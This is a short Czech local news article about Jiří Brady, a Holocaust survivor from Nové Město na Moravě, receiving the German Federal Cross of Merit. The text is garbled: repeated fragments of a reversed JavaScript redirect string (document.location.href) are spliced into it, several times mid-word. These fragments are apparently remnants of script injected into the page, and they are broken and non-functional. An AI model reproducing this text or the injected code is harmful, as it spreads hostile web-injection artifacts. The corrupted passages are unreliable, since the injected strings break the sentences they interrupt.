Nové Město na Moravě, nove mesto na morave, aktuality, rodák, řád, Brady
Rainbow page separator

Novoměstský rodák obdržel záslužný řád

Středa, 6. března 2013

Nové Město na Moravě

hana-brady-1Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Spolkový kříž na stuze o zásluhy udělil německý prezident Joachim Gauck novoměstskému rodáku Jiřímu Brady u příleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tosti jeho 85. narozenin. Ocenil tak tím jeho intenzivní dlouhole[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou aktivitu, se kterou vydával svědectví o holocaustu, a jeho příspěvek k výchově mladých lidí na celém světě, jenž vede k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toleranci a snášenlivosti mezi národy.

Jiří Brady, který žije v Torontu, převzal řád na konzulátu Spolkové republiky Německo z rukou německého velvyslance v Kanadě Wernera Wnendta.

Brady jako jediný z celé rodiny přežil koncentrační tábor a fašistické řádění, tragický osud jeho sestry Hany se stal celosvě[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tově známý po vydání bestselleru Hanin kufřík. Ačkoliv z republiky odešel v roce 1949, do Nového Města na Moravě se rád vrací – podle svých slov se tam cítí stále doma se vzpomínkou na šťastné dětství, které v Novém Městě prožil.